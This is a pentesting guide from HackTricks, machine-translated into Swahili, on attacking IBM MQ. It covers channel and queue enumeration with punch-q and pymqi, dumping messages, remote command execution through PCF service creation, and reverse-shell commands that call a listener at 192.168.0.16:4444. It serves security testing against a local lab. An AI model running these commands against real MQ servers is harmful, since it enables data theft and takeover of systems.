HackTricks1414 - Pentesting IBM MQ
Reading time: 11 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Basic information
IBM MQ ni teknolojia ya IBM ya kusimamia foleni za ujumbe. Kama teknolojia nyingine za message broker, inakusudia kupokea, kuhifadhi, kuchakata na kuainisha taarifa kati ya wazalishaji na watumiaji.
Kwa kawaida, inaonyesha bandari ya TCP ya IBM MQ 1414. Wakati mwingine, HTTP REST API inaweza kuonyeshwa kwenye bandari 9443. Vipimo (Prometheus) vinaweza pia kufikiwa kutoka bandari ya TCP 9157.
Bandari ya TCP ya IBM MQ 1414 inaweza kutumika kubadilisha ujumbe, foleni, kanali, ... lakini pia kudhibiti mfano.
IBM inatoa hati kubwa za kiufundi zinazopatikana kwenye https://www.ibm.com/docs/en/ibm-mq.
Tools
Zana inayopendekezwa kwa matumizi rahisi ni punch-q, kwa matumizi ya Docker. Zana hii inatumia maktaba ya Python pymqi.
Kwa njia ya mikono zaidi, tumia maktaba ya Python pymqi. IBM MQ dependencies zinahitajika.
Installing pymqi
IBM MQ dependencies zinahitaji kusanikishwa na kupakiwa:
- Unda akaunti (IBMid) kwenye https://login.ibm.com/.
- Pakua maktaba za IBM MQ kutoka https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc. Kwa Linux x86_64 ni 9.0.0.4-IBM-MQC-LinuxX64.tar.gz.
- Fanya decompression (
tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz). - Endesha
sudo ./mqlicense.shkukubali masharti ya leseni.
Ikiwa uko chini ya Kali Linux, badilisha faili
mqlicense.sh: ondoa/comment mistari ifuatayo (kati ya mistari 105-110):if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ] then echo "ERROR: This package is incompatible with this system" echo " This package was built for ${BUILD_PLATFORM}" exit 1 fi
- Sanidi hizi pakiti:
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
- Kisha, ongeza muda
.sofiles kwenye LD:export LD_LIBRARY_PATH=/opt/mqm/lib64, kabla ya kutumia zana nyingine zinazotumia utegemezi hizi.
Kisha, unaweza kunakili mradi pymqi: ina vipande vya msimbo vya kuvutia, constants, ... Au unaweza kufunga maktaba moja kwa moja kwa: pip install pymqi.
Kutumia punch-q
Kwa Docker
Tumia tu: sudo docker run --rm -ti leonjza/punch-q.
Bila Docker
Nakili mradi punch-q kisha fuata readme kwa ajili ya usakinishaji (pip install -r requirements.txt && python3 setup.py install).
Baada ya hapo, inaweza kutumika na amri punch-q.
Uhesabu
Unaweza kujaribu kuhesabu jina la meneja wa foleni, watumiaji, njia na foleni kwa kutumia punch-q au pymqi.
Meneja wa Foleni
Wakati mwingine, hakuna ulinzi dhidi ya kupata jina la Meneja wa Foleni:
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
Channels
punch-q inatumia orodha ya maneno ya ndani (inayoweza kubadilishwa) kutafuta vituo vilivyopo. Mfano wa matumizi:
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
Inatokea kwamba baadhi ya mifano ya IBM MQ inakubali maombi ya MQ yasiyo na uthibitisho, hivyo --username / --password hazihitajiki. Kwa hakika, haki za ufikiaji pia zinaweza kutofautiana.
Pale tunapopata jina moja la channel (hapa: DEV.ADMIN.SVRCONN), tunaweza kuorodhesha channel zingine zote.
Uorodheshaji unaweza kufanywa kimsingi na kipande hiki cha msimbo code/examples/dis_channels.py kutoka pymqi:
import logging
import pymqi
logging.basicConfig(level=logging.INFO)
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
prefix = '*'
args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s`' % prefix)
else:
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s`' % channel_name)
qmgr.disconnect()
... Lakini punch-q pia inaingiza sehemu hiyo (ikiwa na maelezo zaidi!). Inaweza kuzinduliwa kwa:
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...
| Name | Type | MCA UID | Conn Name | Xmit Queue | Description | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN | Server-connection | | | | | |
| DEV.APP.SVRCONN | Server-connection | app | | | | |
| SYSTEM.AUTO.RECEIVER | Receiver | | | | Auto-defined by | |
| SYSTEM.AUTO.SVRCONN | Server-connection | | | | Auto-defined by | |
| SYSTEM.DEF.AMQP | AMQP | | | | | |
| SYSTEM.DEF.CLUSRCVR | Cluster-receiver | | | | | |
| SYSTEM.DEF.CLUSSDR | Cluster-sender | | | | | |
| SYSTEM.DEF.RECEIVER | Receiver | | | | | |
| SYSTEM.DEF.REQUESTER | Requester | | | | | |
| SYSTEM.DEF.SENDER | Sender | | | | | |
| SYSTEM.DEF.SERVER | Server | | | | | |
| SYSTEM.DEF.SVRCONN | Server-connection | | | | | |
| SYSTEM.DEF.CLNTCONN | Client-connection | | | | | |
Queues
Kuna kipande cha msimbo na pymqi (dis_queues.py) lakini punch-q inaruhusu kupata vipande vingi vya taarifa kuhusu foleni:
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description |
| | | | | | GR Name | eue Nam | |
| | | | | | | e | |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local | Normal | 0 | | | |
| 0 18.35.1 | E | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.1 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.2 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.3 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
# Truncated
Exploit
Dump messages
Unaweza kulenga foleni(s)/kanali(s) ili kunusa / kutupa ujumbe kutoka kwao (operesheni isiyo na uharibifu). Mifano:
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
Usisite kujaribu kwenye foleni zote zilizotambuliwa.
Utekelezaji wa msimbo
Maelezo machache kabla ya kuendelea: IBM MQ inaweza kudhibitiwa kwa njia nyingi: MQSC, PCF, Control Command. Orodha za jumla zinaweza kupatikana katika IBM MQ documentation. PCF (Mifumo ya Amri Inayoweza Kupangwa) ndiyo tunayoangazia ili kuingiliana kwa mbali na mfano. punch-q na zaidi pymqi zinategemea mwingiliano wa PCF.
Unaweza kupata orodha ya amri za PCF:
Amri moja ya kuvutia ni
MQCMD_CREATE_SERVICEna hati zake zinapatikana hapa. Inachukua kama hojaStartCommandinayotaja programu ya ndani kwenye mfano (mfano:/bin/sh).Pia kuna onyo la amri katika hati: "Kumbuka: Amri hii inaruhusu mtumiaji kuendesha amri yoyote kwa mamlaka ya mqm. Ikiwa haki za kutumia amri hii zitatolewa, mtumiaji mbaya au asiye makini anaweza kufafanua huduma inayoharibu mifumo yako au data, kwa mfano, kwa kufuta faili muhimu."
Kumbuka: kila wakati kulingana na IBM MQ documentation (Marejeo ya Usimamizi), pia kuna kiunganishi cha HTTP kwenye
/admin/action/qmgr/{qmgrName}/mqscili kuendesha amri sawa ya MQSC kwa ajili ya uundaji wa huduma (DEFINE SERVICE). Kipengele hiki hakijajadiliwa hapa bado.
Uundaji / kufuta huduma kwa PCF kwa utekelezaji wa programu ya mbali unaweza kufanywa na punch-q:
Mfano 1
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
Katika kumbukumbu za IBM MQ, unaweza kusoma amri imefanikiwa kutekelezwa:
2023-10-10T19:13:01.713Z AMQ5030I: Amri '808544aa7fc94c48' imeanza. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
Unaweza pia kuhesabu programu zilizopo kwenye mashine (hapa /bin/doesnotexist ... haipo):
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436
Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done
Kumbuka kwamba uzinduzi wa programu ni wa asynchronic. Hivyo unahitaji kipengele cha pili ili kutumia exploit (listener kwa ajili ya reverse shell, uundaji wa faili kwenye huduma tofauti, uhamasishaji wa data kupitia mtandao ...)
Mfano wa 2
Kwa shell rahisi ya reverse, punch-q inapendekeza pia payloads mbili za reverse shell:
- Moja na bash
- Moja na perl
Kwa hakika unaweza kujenga moja ya kawaida kwa kutumia amri ya execute.
Kwa bash:
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
Kwa perl:
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
Custom PCF
Unaweza kuchimba katika nyaraka za IBM MQ na kutumia moja kwa moja maktaba ya pymqi ya python ili kujaribu amri maalum za PCF ambazo hazijatekelezwa katika punch-q.
Mfano:
import pymqi
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
print("Error")
else:
# Process response
qmgr.disconnect()
Ikiwa huwezi kupata majina ya kudumu, unaweza kurejelea IBM MQ documentation.
_Mfano wa
MQCMD_REFRESH_CLUSTER(Decimal = 73). Inahitaji parameterMQCA_CLUSTER_NAME(Decimal = 2029) ambayo inaweza kuwa_(Doc: ):*import pymqi queue_manager = 'MYQUEUEMGR' channel = 'DEV.ADMIN.SVRCONN' host = '172.17.0.2' port = '1414' conn_info = '%s(%s)' % (host, port) user = 'admin' password = 'passw0rd' qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password) pcf = pymqi.PCFExecute(qmgr) try: args = {2029: "*"} response = pcf.MQCMD_REFRESH_CLUSTER(args) except pymqi.MQMIError as e: print("Error") else: print(response) qmgr.disconnect()
Mazingira ya kupima
Ikiwa unataka kupima tabia na matumizi ya IBM MQ, unaweza kuunda mazingira ya ndani kulingana na Docker:
- Kuwa na akaunti kwenye ibm.com na cloud.ibm.com.
- Unda IBM MQ iliyowekwa kwenye kontena na:
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
Kwa default, uthibitishaji umewezeshwa, jina la mtumiaji ni admin na nenosiri ni passw0rd (Kigezo cha mazingira MQ_ADMIN_PASSWORD). Hapa, jina la meneja wa foleni limewekwa kuwa MYQUEUEMGR (kigezo MQ_QMGR_NAME).
Unapaswa kuwa na IBM MQ ikifanya kazi na bandari zake zikiwa wazi:
❯ sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
Toleo la zamani la picha za IBM MQ docker ziko kwenye: https://hub.docker.com/r/ibmcom/mq/.